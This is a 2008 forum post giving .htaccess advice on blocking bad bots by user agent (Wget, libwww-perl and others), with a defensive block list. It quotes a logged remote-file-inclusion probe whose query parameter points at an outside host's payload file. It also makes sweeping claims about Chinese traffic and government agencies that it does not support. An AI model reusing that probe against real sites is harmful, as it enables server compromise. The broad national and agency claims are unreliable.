sparky Posted September 6, 2008 Share Posted September 6, 2008 I thought I'd share this info as I found it quite interesting and very true. How to protect your web site security - .htaccess file and server security / web site security: What to put into your htaccess file to enhance your server security First of all you have to be aware that the greatest and first above all security risk for your entire site is you - your lack of knowledge about details of your own site, your own scripts installed and your lack of knowledge about the entire sever security aspect in general. It is far too easy nowadays to download for free a bunch of software from blog, to forum to CMS, a few clicks and some semi-automated install scripts do the job for you. Fine you think and start to invite friends and users from your mail list to post, to publish, to chat, to be interactive in all possible ways ... A typical point of entry into your site, into your server or into your scripts is by your doors you left open, by faulty scripts or by lack of server/site/file or folder permissions and incomplete configurations. To give you a reality shock - my own server hat from early this year until earlier today a total of 218'937 password crack attempts - that's more than 500 each day - several hackers each day. That appears to be a global average and quiet normal! Do YOU KNOW how many attempts YOU have/had during this past year ??? If NOT then you are gross negligent and a danger to you and all www society because then you simply are far beyond your own limits of skills, knowledge and expertise or simply careless about global security. A few days ago I met such a typical example of a careless site owner - in recent few weeks he opened once more a new web site for real estate business.l When talking about server security, about hackers setting up phishing mail web sites on his server, etc, about hackers possibly using his servers to damage others, to get passwords and access data to other people's bank accounts - all he repeatedly said "I don't care!" He is none of the millions without knowledge or experience, contrary, his knowledge is far above average on a professional level. But - he doesn't care - period. With above in your heart and mind - it is above all you the one to learn how to secure your software installed. But meanwhile of course there also are a few other steps to successfully block off some attempts in their early stages. Note that below .htaccess configuration is absolutely NO replacement for your own care and careful security oriented configuration of your entire web site and your server. But below .htaccess entries may provide additional protection before even a risk occurs. To collect data about possible "victim sites" the potential hackers first need to find vulnerabilities on sites, sites with security holes unfixed, sites with particular scripts installed, etc. Hence some of the malicious activities requires some preparation done by bots - by user agents. The below list is a small list of most malicious bots - there certainly exist far more. Here below a full example for a .htaccess entry security related - you may safely copy and paste below lines into your .htaccess file at root level of your site.: SetEnvIf user-agent "Indy Library" stayout=1 SetEnvIf user-agent "libwww-perl" stayout=1 SetEnvIf user-agent "Offline Navigator" stayout=1 SetEnvIf user-agent "Xaldon WebSpider" stayout=1 SetEnvIf user-agent "Wget" stayout=1 SetEnvIf user-agent "WebImages" stayout=1 SetEnvIf user-agent "WebCapture" stayout=1 SetEnvIf user-agent "LiteFinder" stayout=1 SetEnvIf user-agent "disco" stayout=1 SetEnvIf user-agent "SBIder" stayout=1 SetEnvIf user-agent "MJ12bot" stayout=1 Order Allow,deny Allow from all deny from env=stayout I explain a little what some of above bots do. But first of all the criteria I used to select them all. All of them leave an entry in your access_log file of your apache server. Usual behavior of a bot / agent is to leave a URL to that bot's homepage or project page. Hence I visited the homepages OR verified the precise activities of each bot to really see what that bot is doing on my web site. By far not every bot does what the project page / bot homepage says or pretends to do! Example 1: LiteFinder Network Crawler An example of such a research done and the basis of denying access is shown below from the bot "LiteFinder" and his "home - URL" http://www.litefinder.net/about.html, we read: "... LiteFinder Network Crawler is a research project started by a group of Indian candidates from the cities of Bangalore, Patna and Jaipur. The project serves as a testing ground for information search technologies and programs, developed by a group of young scientists. LiteFinder Network Crawler was started as the means of simplifying the search of specific information at the sites that can be found with the help of general-purpose search engines. ... " A little further down we read: Can I learn the IP addresses, which LiteFinder Network Crawler comes from? Unfortunately, You can't since it is against the rules of our company. Here a list of LiteFinder IPs collected from my entire this years access_log files as well as a few additions made from Project Honey Pot: 64.34.255.239 67.19.250.26 71.158.134.213 74.53.249.34 75.125.52.146 75.125.18.178 216.40.220.18 216.40.220.34 216.40.222.66 216.40.222.82 216.40.222.98 My opinion: Only criminals have something to hide! Does LiteFinder Network Crawler accept the directives from robots.txt file? LiteFinder Network Crawler can recognize the directives from robots.txt files only partially, which is the result of the scantiness of our resources. Full support of robots.txt will be launched soon. Every descent bot DOES follow the robots.txt rules - above statement simply means the "research project" wants to sneak into your server and site to collect data beyond what you would expect and allow. They can do so safely knowing well that the vast majority of site owners have zero knowledge about hackers, security issues and risks and may never discover any malicious activity nor even discover hackers inside their own server until a host or cybercrime investigating agency such as IC3 (Internet Crime Complaint Center), CIA or FBI contacts the site owner. All 3 before mentioned agencies have their own Cybercrime specialized department, a web site and online registration page to file formal complaints. An earlier article may help you to learn more about Security aspects for your home computer and web server. Example 2: Indy Library Indy Library is a bot that is used / was used on my site by the ten thousands of times from a large and growing number of Chinese IP's - just to create fake traffic and load a few pages thousands of times each day for no other reason than to create fake traffic to let an entire country appear bigger thus more important www-wise. I have in this case denied access to the bot - and since China is a host of many hackers, I also have blocked most Chinese networks as well using iptables. Example 3: libwww-perl libwww-perl agent is used to do real bad stuff very directly. A research of my access_log files shows that many attempts done by libwww-perl are attempts to directly upload pictures or files into your site - fully automated - such files typically contain infected files code of various file extensions, txt, jpg and many others ... denying access to the bot first will lead to entries into error_log and from there you can easily visually verify the exact activity and also extract IPs for later full block using again iptables. Here below an access_log file entry as it is typical for libwww-perl users. Without being a real IT/www pro you can see that these intentions definitly are of most destructive nature. Anyone who allows UPLOAD of any kind of file, txt, html, jpeg, gif, png, may be hosting hacker files linked in this request below. access_log-20071031.gz:81.169.184.193 - - [31/Oct/2007:23:17:47 +0800] "GET /wallpapers/widescreen_wallpapers/_theme/breadcrumb.php?rootBase=http://www.2send.us/uploads/1765f39098.txt? HTTP/1.1" 404 19393 "-" "libwww-perl/5.69" This libwww-perl-bot visit served the purpose to find a script vulnerability in a file "breadcrumb.php" in a subfolder commonly named _theme but NON-existing on my site - hence the server response 404 ( file not found ). /wallpapers/widescreen_wallpapers/_theme/breadcrumb.php?rootBase=http://www.2send.us/uploads/1765f39098.txt? The actual hacker file to upload onto the victim's site would be the file located at: http://www.2send.us/uploads/1765f39098.txt At the moment of this writing that hacker file still existed on that site 2send.us ... Reasons to deny access to a particular user agent As in above examples shown, the reason to deny access using .htaccess and / or iptables is above all a security reason and also a bandwidth reason. If a search engine comes many thousand times per months but creates zero human traffic like in one case studied by me, then that search engine bot needs to be grounded by both an entry in .htaccess as well as iptables. Never take my above .htaccess list for granted. While you may make your life easier and simply copy and paste above deny list into your own .htaccess file - if you have time in excess, you may use Googel search and research each and every of above agents to make up your own mind and make your own decision based on your preferences, likes and dislikes. Intense study of all server log files - dozens of hours if needed and possible - to learn what some of these bots want to do or can do as well as to see what typical and sometimes weird paths such bots travel on your site into admin areas or areas where no single person other than you ever have any business to stay. Learn to understand how hackers work and while being polite and loving - secure your site as tight as ever possible. 0 Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.